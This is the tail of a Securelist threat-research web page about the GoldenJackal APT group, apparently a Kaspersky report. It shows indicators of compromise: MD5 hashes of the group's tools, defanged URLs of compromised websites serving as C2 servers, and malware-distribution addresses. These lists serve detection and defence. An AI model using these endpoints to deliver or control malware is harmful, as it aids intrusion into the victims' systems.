href="https://opentip.kaspersky.com/4f041937da7748ebf6d0bbc44f1373c9/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4f041937da7748ebf6d0bbc44f1373c9</a><br /> <a href="https://opentip.kaspersky.com/eab4f3a69b2d30b16df3d780d689794c/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">eab4f3a69b2d30b16df3d780d689794c</a><br /> <a href="https://opentip.kaspersky.com/8c1070f188ae87fba1148a3d791f2523/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8c1070f188ae87fba1148a3d791f2523</a></p> <p><strong>JackalSteal</strong><br /> <a href="https://opentip.kaspersky.com/c05999b9390a3d8f4086f6074a592bc2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c05999b9390a3d8f4086f6074a592bc2</a></p> <p><strong>JackalWorm</strong><br /> <a href="https://opentip.kaspersky.com/5de309466b2163958c2e12c7b02d8384/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5de309466b2163958c2e12c7b02d8384</a></p> <p><strong>JackalPerInfo</strong><br /> <a href="https://opentip.kaspersky.com/a491aefb659d2952002ef20ae98d7465/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a491aefb659d2952002ef20ae98d7465</a></p> <p><strong>JackalScreenWatcher</strong><br /> <a href="https://opentip.kaspersky.com/1072bfeee89e369a9355819ffa39ad20/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1072bfeee89e369a9355819ffa39ad20</a></p> <h3 id="legitimate-compromised-websites">Legitimate compromised websites</h3> <p><strong>JackalControl C2</strong><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fabert-online.de%2Fmeeting%2Fplugins.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://abert-online[.]de/meeting/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Facehigh.host%2Frobotx.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://acehigh[.]host/robotx[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fassistance.uz%2Fadmin%2Fplugins.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://assistance[.]uz/admin/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fcnom.sante.gov.ml%2Fcomponents%2Fcom_avreloaded%2Fviews%2Fpopup%2Ftmpl%2Fheader.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://cnom[.]sante[.]gov[.]ml/components/com_avreloaded/views/popup/tmpl/header[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Finfo.merysof.am%2Fplugins%2Fsearch%2Fcontent%2Fplugins.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://info[.]merysof[.]am/plugins/search/content/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Finvest.zyrardow.pl%2Fadmin%2Fmodel%2Fsetting%2Fplugins.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://invest[.]zyrardow[.]pl/admin/model/setting/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fweblines.gr%2Fgallery%2Fgallery_input.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://weblines[.]gr/gallery/gallery_input[.]php</a><br /> <a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.wetter-bild.de%2Fplugins.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www[.]wetter-bild[.]de/plugins[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fajapnyakmc.com%2Fwp-content%2Fcache%2Findex.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://ajapnyakmc[.]com/wp-content/cache/index[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fasusiran.com%2Fwp-content%2Fplugins%2Fpersian-woocommerce%2Finclude%2Fclass-cache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://asusiran[.]com/wp-content/plugins/persian-woocommerce/include/class-cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fasusiran.com%2Fwp-content%2Fthemes%2Fwoodmart%2Finc%2Fmodules%2Fcache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://asusiran[.]com/wp-content/themes/woodmart/inc/modules/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fcroma.vn%2Fwp-content%2Fthemes%2Fcroma%2Ftemplate-parts%2Ffooter.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://croma[.]vn/wp-content/themes/croma/template-parts/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fden-photomaster.kz%2Fwp-track.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://den-photomaster[.]kz/wp-track[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Feyetelligence.ai%2Fwp-content%2Fthemes%2Fcms%2Finc%2Ftemplate-parts%2Ffooter.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://eyetelligence[.]ai/wp-content/themes/cms/inc/template-parts/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Ffinasteridehair.com%2Fwp-includes%2Fclass-wp-network-statistics.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://finasteridehair[.]com/wp-includes/class-wp-network-statistics[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fgradaran.be%2Fwp-content%2Fthemes%2Ftb-sound%2Finc%2Ffooter.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://gradaran[.]be/wp-content/themes/tb-sound/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fmehrganhospital.com%2Fwp-includes%2Fclass-wp-tax-system.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://mehrganhospital[.]com/wp-includes/class-wp-tax-system[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fmeukowcognac.com%2Fwp-content%2Fthemes%2Fastra%2Fpage-flags.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://meukowcognac[.]com/wp-content/themes/astra/page-flags[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fnassiraq.iq%2Fwp-includes%2Fclass-wp-header-styles.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://nassiraq[.]iq/wp-includes/class-wp-header-styles[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fnew.jmcashback.com%2Fwp-track.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://new[.]jmcashback[.]com/wp-track[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fnews.lmond.com%2Fwp-content%2Fthemes%2Fnewsbook%2Finc%2Ffooter.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://news[.]lmond[.]com/wp-content/themes/newsbook/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fcache%2Ffunctions.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/cache/functions[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fthemes%2Fdt-the7%2Finc%2Fcache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/dt-the7/inc/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fpabalochistan.gov.pk%2Fnew%2Fwp-content%2Fthemes%2Ftwentyfifteen%2Fcontent-manager.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/twentyfifteen/content-manager[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsbj-i.com%2Fwp-content%2Fplugins%2Fwp-persian%2Fincludes%2Fclass-wp-cache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://sbj-i[.]com/wp-content/plugins/wp-persian/includes/class-wp-cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsbj-i.com%2Fwp-content%2Fthemes%2Fhamyarwp-spacious%2Fcache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://sbj-i[.]com/wp-content/themes/hamyarwp-spacious/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fsokerpower.com%2Fwp-includes%2Fclass-wp-header-styles.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://sokerpower[.]com/wp-includes/class-wp-header-styles[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Ftechnocometsolutions.com%2Fwp-content%2Fthemes%2Fseofy%2Ftemplates-sample.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://technocometsolutions[.]com/wp-content/themes/seofy/templates-sample[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.djstuff.fr%2Fwp-content%2Fthemes%2Ftwentyfourteen%2Finc%2Ffooter.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]djstuff[.]fr/wp-content/themes/twentyfourteen/inc/footer[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.perlesoie.com%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fincludes%2Fcache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]perlesoie[.]com/wp-content/plugins/contact-form-7/includes/cache[.]php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.perlesoie.com%2Fwp-content%2Fthemes%2Fflatsome%2Finc%2Fclasses%2Fclass-flatsome-cache.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]perlesoie[.]com/wp-content/themes/flatsome/inc/classes/class-flatsome-cache[.]php</a></p> <p><strong>JackalSteal/JackalScreenWatcher C2</strong><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Ftahaherbal.ir%2Fwp-includes%2Fclass-wp-http-iwr-client.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwinoptimum.com%2Fwp-includes%2Fcustomize%2Fclass-wp-customize-sidebar-refresh.php/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://winoptimum[.]com/wp-includes/customize/class-wp-customize-sidebar-refresh.php</a></p> <p><strong>Distribution websites</strong><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.pak-developers.net%2Finternal_data%2Ftemplates%2Ftemplate.html/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]pak-developers[.]net/internal_data/templates/template.html</a><br /> <a href="https://opentip.kaspersky.com/https%3A%2F%2Fwww.pak-developers.net%2Finternal_data%2Ftemplates%2Fbottom.jpg/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://www[.]pak-developers[.]net/internal_data/templates/bottom.jpg</a></p> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/net/" class="c-link-tag"><span>.NET</span></a></li> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/backdoor/" class="c-link-tag"><span>Backdoor</span></a></li> <li><a href="https://securelist.com/tag/cyber-espionage/" class="c-link-tag"><span>Cyber espionage</span></a></li> <li><a href="https://securelist.com/tag/data-theft/" class="c-link-tag"><span>Data theft</span></a></li> <li><a href="https://securelist.com/tag/goldenjackal/" class="c-link-tag"><span>GoldenJackal</span></a></li> <li><a href="https://securelist.com/tag/malware/" class="c-link-tag"><span>Malware</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/targeted-attacks/" class="c-link-tag"><span>Targeted attacks</span></a></li> </ul> </div> <div class="c-article__authors u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> </ul> </div> </div> <div id="comments" class="entry-comments c-article__comments js-comments-wrapper"> <p class="c-title--extra-small">Meet the GoldenJackal APT group. Don&#8217;t expect any howls</p> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="u-hidden"> <small></small></h3><form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment --><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required" /></p> <p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required" /></p> <script type="text/javascript"> document.addEventListener("input", function (event) { if (!event.target.closest("#comment")) return; try{ grecaptcha.render("recaptcha-submit-btn-area", { "sitekey" : "6LfQdrAaAAAAAEb_rTrwlbyc8z0Fa9CMjELY_2Ts", "theme" : "standard" }); }catch(error){/*possible duplicated instances*/} }); </script> <script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async defer></script> <div id="recaptcha-submit-btn-area">&nbsp;</div> <noscript> <style type="text/css">#form-submit-save {display:none;}</style> <input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment"/> </noscript> <p class="form-submit"><input name="submit" type="submit" id="commentsubmit" class="submit" value="Comment" /><a rel="nofollow" id="cancel-comment-reply-link" href="/goldenjackal-apt-group/109677/#respond" style="display:none;">Cancel</a> <input type='hidden' name='comment_post_ID' value='109677' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="725f5b187c" /></p><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="123"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div><!-- #respond --> </div><!-- .entry-comments --> </div> <div class="o-col c-article__sidebar c-widgets--distributed u-hidden u-flex@md"> <div class="c-widget__wrapper"> <div class="c-highlight js-accordion is-active u-hidden u-block@md js-sticky-widget"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#jackalcontrol">JackalControl</a></li><ul class='c-list-links'><li><a href="#installer-mode">Installer mode</a></li><ul class='c-list-links'><li><a href="#persistence">Persistence</a></li></ul></ul><li><a href="#jackalsteal">JackalSteal</a></li><li><a href="#jackalworm">JackalWorm</a></li><li><a href="#jackalperinfo">JackalPerInfo</a></li><li><a href="#jackalscreenwatcher">JackalScreenWatcher</a></li><li><a href="#infrastructure">Infrastructure</a></li><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li><li><a href="#conclusions">Conclusions</a></li><li><a href="#indicators-of-compromise">Indicators of compromise</a></li><ul class='c-list-links'><li><a href="#md5-hashes">MD5 hashes</a></li><li><a href="#legitimate-compromised-websites">Legitimate compromised websites</a></li></ul> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">GReAT webinars</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-05-13T13:00:00+00:00" class="c-card__event-date"> 13 May 2021, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__link">GReAT Ideas. Balalaika Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-02-26T12:00:00+00:00" class="c-card__event-date"> 26 Feb 2021, 12:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__link">GReAT Ideas. Green Tea Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/johnhultquist/" > <span>John Hultquist</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/suguru/" > <span>Suguru Ishimaru</span></a> </li> <li> <a href="https://securelist.com/author/vitalykamluk/" > <span>Vitaly Kamluk</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <span>Seongsu Park</span></a> </li> <li> <a href="https://securelist.com/author/yusukeniwa/" > <span>Yusuke Niwa</span></a> </li> <li> <a href="https://securelist.com/author/motohikosato/" > <span>Motohiko Sato</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-06-17T13:00:00+00:00" class="c-card__event-date"> 17 Jun 2020, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-malware-attribution-and-next-gen-iot-honeypots/" class="c-card__link">GReAT Ideas. Powered by SAS: malware attribution and next-gen IoT honeypots</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/marcopreuss/" > <span>Marco Preuss</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/kurtb/" > <span>Kurt Baumgartner</span></a> </li> <li> <a href="https://securelist.com/author/dandemeter/" > <span>Dan Demeter</span></a> </li> <li> <a href="https://securelist.com/author/yaroslavshmelev/" > <span>Yaroslav Shmelev</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-08-26T14:00:00+00:00" class="c-card__event-date"> 26 Aug 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-actors-advance-on-new-fronts/" class="c-card__link">GReAT Ideas. Powered by SAS: threat actors advance on new fronts</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/ivankwiatkowski/" > <span>Ivan Kwiatkowski</span></a> </li> <li> <a href="https://securelist.com/author/maheryamout/" > <span>Maher Yamout</span></a> </li> <li> <a href="https://securelist.com/author/noushinshabab/" > <span>Noushin Shabab</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/felixaime/" > <span>Félix Aime</span></a> </li> <li> <a href="https://securelist.com/author/giampaolodedola/" > <span>Giampaolo Dedola</span></a> </li> <li> <a href="https://securelist.com/author/santiago/" > <span>Santiago Pontiroli</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2020-07-22T14:00:00+00:00" class="c-card__event-date"> 22 Jul 2020, 2:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-powered-by-sas-threat-hunting-and-new-techniques/" class="c-card__link">GReAT Ideas. Powered by SAS: threat hunting and new techniques</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/dimitrybestuzhev/" > <span>Dmitry Bestuzhev</span></a> </li> <li> <a href="https://securelist.com/author/costin/" > <span>Costin Raiu</span></a> </li> <li> <a href="https://securelist.com/author/pierredelcher/" > <span>Pierre Delcher</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/arieljungheit/" > <span>Ariel Jungheit</span></a> </li> <li> <a href="https://securelist.com/author/fabioa/" > <span>Fabio Assolini</span></a> </li> </ul> </div> </footer> </div> </article> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">From the same authors</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/sidewinder-apt/114089/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/10/11172712/SL-SideWinder-StealerBot-featured-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/sidewinder-apt/114089/" class="c-card__link">Beyond the Surface: the evolution and expansion of the SideWinder APT group</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/10/12092515/SL_featured_ToddyCat-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" class="c-card__link">ToddyCat: Keep calm and check logs</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/toddycat/106799/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21102251/intro_toddycat_apt-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/toddycat/106799/" class="c-card__link">APT ToddyCat</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div class="c-card__body"> <header class="c-card__header"> <h3 class="c-card__title"><a href="https://securelist.com/transparent-tribe-part-2/98233/" class="c-card__link">Transparent Tribe: Evolution analysis, part 2</a></h3> </header> </div> </article> </div> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <a href="https://securelist.com/transparent-tribe-part-1/98127/" class="c-card__figure" style=""> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/11130332/securelist_abs_5-800x450.jpg" data-srcset="" srcset="" /> </a> <div 